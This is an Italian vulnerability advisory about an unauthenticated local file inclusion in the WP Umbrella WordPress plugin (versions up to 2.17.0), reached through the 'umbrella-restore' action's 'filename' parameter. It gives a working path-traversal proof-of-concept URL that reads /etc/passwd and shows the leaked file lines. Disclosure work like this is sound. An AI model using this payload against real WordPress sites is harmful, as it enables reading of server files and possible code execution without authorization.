
WP Umbrella: Aggiornamento, Backup, Ripristino e Monitoraggio <= 2.17.0 - Inclusione di file locale non autenticata
WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - Inclusione di File Locale Non Autenticata
Il plugin WP Umbrella: Update Backup Restore & Monitoring per WordPress è vulnerabile all'Inclusione di File Locale in tutte le versioni fino alla 2.17.0 inclusa, tramite il parametro 'filename' dell'azione 'umbrella-restore'. Ciò consente ad attaccanti non autenticati di includere ed eseguire file arbitrari sul server, permettendo l'esecuzione di qualsiasi codice PHP presente in tali file. Questo può essere utilizzato per aggirare i controlli di accesso, ottenere dati sensibili o raggiungere l'esecuzione di codice nei casi in cui immagini e altri tipi di file "sicuri" possano essere caricati e inclusi.
https://wp-dev.ddev.site/?umbrella-restore=1&filename=../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin